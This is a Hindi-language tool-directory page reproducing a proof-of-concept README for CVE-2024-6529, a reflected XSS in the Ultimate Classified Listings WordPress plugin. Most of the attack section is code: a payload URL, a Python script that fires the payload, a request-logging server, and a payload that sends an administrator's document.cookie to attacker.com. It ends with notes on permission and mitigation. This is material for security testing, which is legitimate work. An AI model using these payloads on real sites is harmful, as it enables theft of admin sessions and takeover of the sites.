Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-6529 — Ultimate Classified Listings WordPress प्लगइन में प्रतिबिंबित XSS और क्राफ्टेड पेलोड और लॉगिंग सर्वर के माध्यम से व्यवस्थापक कुकी चोरी का प्रदर्शन करने वाली प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/abdurahmon3236/cve-2024-6529
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफिशिंगपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंग
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

Ultimate Classified Listings WordPress प्लगइन में प्रतिबिंबित XSS और क्राफ्टेड पेलोड और लॉगिंग सर्वर के माध्यम से व्यवस्थापक कुकी चोरी का प्रदर्शन करने वाली प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट।

रिपॉजिटरी देखें
62 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

वर्डप्रेस प्लगइन्स में कमजोरियों के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC)

इस रिपॉजिटरी में विभिन्न वर्डप्रेस प्लगइन्स में खोजी गई विभिन्न कमजोरियों के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट्स शामिल हैं। ये स्क्रिप्ट्स दर्शाती हैं कि हमलावर इन कमजोरियों का उपयोग करके दुर्भावनापूर्ण क्रियाएं कैसे कर सकते हैं।

विषय-सूची

  • शामिल कमजोरियां
  • सेटअप और उपयोग
    • अल्टीमेट क्लासिफाइड लिस्टिंग्स प्लगइन में रिफ्लेक्टेड XSS
    • XSS का उपयोग करके कुकीज़ चुराना
  • महत्वपूर्ण विचार

शामिल कमजोरियां

  1. अल्टीमेट क्लासिफाइड लिस्टिंग्स प्लगइन में रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)

  • अल्टीमेट क्लासिफाइड लिस्टिंग्स वर्डप्रेस प्लगइन के संस्करण 1.4 से पहले के संस्करणों में एक कमजोरी हमलावरों को असैनिटाइज़्ड पैरामीटर के माध्यम से दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करके मनमाना जावास्क्रिप्ट निष्पादित करने की अनुमति देती है।
  • XSS का उपयोग करके कुकीज़ चुराना

    • दर्शाता है कि कैसे एक हमलावर रिफ्लेक्टेड XSS कमजोरी का उपयोग करके उच्च-विशेषाधिकार वाले उपयोगकर्ताओं (जैसे एडमिन) की कुकीज़ को एक दुर्भावनापूर्ण सर्वर पर भेजकर चुरा सकता है।
  • सेटअप और उपयोग

    अल्टीमेट क्लासिफाइड लिस्टिंग्स प्लगइन में रिफ्लेक्टेड XSS

    यह PoC दर्शाता है कि अल्टीमेट क्लासिफाइड लिस्टिंग्स प्लगइन में रिफ्लेक्टेड XSS कमजोरी का उपयोग कैसे किया जाए।

    1. कमजोर पैरामीटर की पहचान करें:

      • मान लें कि कमजोर पैरामीटर search है, जो URL http://example.com/classifieds में है।
    2. एक दुर्भावनापूर्ण URL बनाएं:

      • दुर्भावनापूर्ण URL में एक अलर्ट डायलॉग निष्पादित करने के लिए पेलोड शामिल हो सकता है:
        root@kitploit:~
        http://example.com/classifieds?search=<script>alert('XSS')</script>
        
    3. PoC स्क्रिप्ट चलाएं:

      • नीचे दी गई स्क्रिप्ट को xss_poc.py के रूप में सेव करें और इसे चलाएं।
      root@kitploit:~
      import requests
      
      # कॉन्फ़िगरेशन
      target_url = "http://example.com/classifieds"  # इसे लक्ष्य साइट के URL में बदलें
      payload = "<script>alert('XSS')</script>"  # XSS पेलोड
      
      def trigger_xss():
          # दुर्भावनापूर्ण URL बनाएं
          malicious_url = f"{target_url}?search={payload}"
      
          # दुर्भावनापूर्ण URL पर GET अनुरोध भेजें
          response = requests.get(malicious_url)
      
          # जाँचें कि क्या पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ है
          if payload in response.text:
              print("[+] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ।")
              print("[+] दुर्भावनापूर्ण URL:", malicious_url)
          else:
              print("[-] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित नहीं हुआ।")
      
      if __name__ == "__main__":
          trigger_xss()
      

    XSS का उपयोग करके कुकीज़ चुराना

    यह PoC दर्शाता है कि कैसे एक हमलावर रिफ्लेक्टेड XSS कमजोरी का उपयोग करके उच्च-विशेषाधिकार वाले उपयोगकर्ताओं से कुकीज़ चुरा सकता है।

    1. एक दुर्भावनापूर्ण सर्वर सेटअप करें:

      • नीचे दी गई स्क्रिप्ट को malicious_server.py के रूप में सेव करें और इसे चलाकर एक सर्वर शुरू करें जो आने वाले अनुरोधों (कुकीज़ सहित) को लॉग करता है।
      root@kitploit:~
      from http.server import BaseHTTPRequestHandler, HTTPServer
      import logging
      
      class RequestHandler(BaseHTTPRequestHandler):
          def do_GET(self):
              logging.info(f"अनुरोध प्राप्त हुआ: {self.headers}")
              self.send_response(200)
              self.end_headers()
      
      def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
          logging.basicConfig(filename='server.log', level=logging.INFO)
          server_address = ('', port)
          httpd = server_class(server_address, handler_class)
          logging.info(f'सर्वर पोर्ट {port} पर शुरू हो रहा है...')
          httpd.serve_forever()
      
      if __name__ == "__main__":
          run()
      
    2. कुकीज़ चुराने के लिए एक पेलोड तैयार करें:

      • एक पेलोड बनाएं जो एडमिन की कुकीज़ को दुर्भावनापूर्ण सर्वर पर भेजे:
        root@kitploit:~
        http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
        
    3. PoC स्क्रिप्ट चलाएं:

      • नीचे दी गई स्क्रिप्ट को steal_cookies_poc.py के रूप में सेव करें और इसे चलाएं।
      root@kitploit:~
      import requests
      
      # कॉन्फ़िगरेशन
      target_url = "http://example.com/classifieds"  # इसे लक्ष्य साइट के URL में बदलें
      attacker_server = "http://attacker.com:8080"  # इसे अपने दुर्भावनापूर्ण सर्वर के URL में बदलें
      payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
      
      def trigger_xss():
          # दुर्भावनापूर्ण URL बनाएं
          malicious_url = f"{target_url}?search={payload}"
      
          # दुर्भावनापूर्ण URL पर GET अनुरोध भेजें
          response = requests.get(malicious_url)
      
          # जाँचें कि क्या पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ है
          if payload in response.text:
              print("[+] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ।")
              print("[+] दुर्भावनापूर्ण URL:", malicious_url)
          else:
              print("[-] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित नहीं हुआ।")
      
      if __name__ == "__main__":
          trigger_xss()
      

    महत्वपूर्ण विचार

    • अनुमति: सुनिश्चित करें कि आपके पास लक्ष्य साइट पर इन कमजोरियों का परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत पहुंच अवैध और अनैतिक है।
    • परीक्षण वातावरण: उत्पादन प्रणालियों को प्रभावित करने से बचने के लिए इन परीक्षणों को नियंत्रित वातावरण में करें।
    • शमन: अल्टीमेट क्लासिफाइड लिस्टिंग्स प्लगइन को संस्करण 1.4 या उसके बाद अपडेट करें। आउटपुट में शामिल करने से पहले उपयोगकर्ता इनपुट को हमेशा सैनिटाइज़ और एस्केप करें।

    ये PoC दर्शाते हैं कि कैसे एक हमलावर वर्डप्रेस प्लगइन्स में कमजोरियों का उपयोग करके दुर्भावनापूर्ण क्रियाएं कर सकता है। हमेशा अपने सॉफ्टवेयर को अपडेट रखें और ऐसी कमजोरियों को रोकने के लिए सुरक्षा सर्वोत्तम प्रथाओं का पालन करें।

    टूल डाउनलोड करें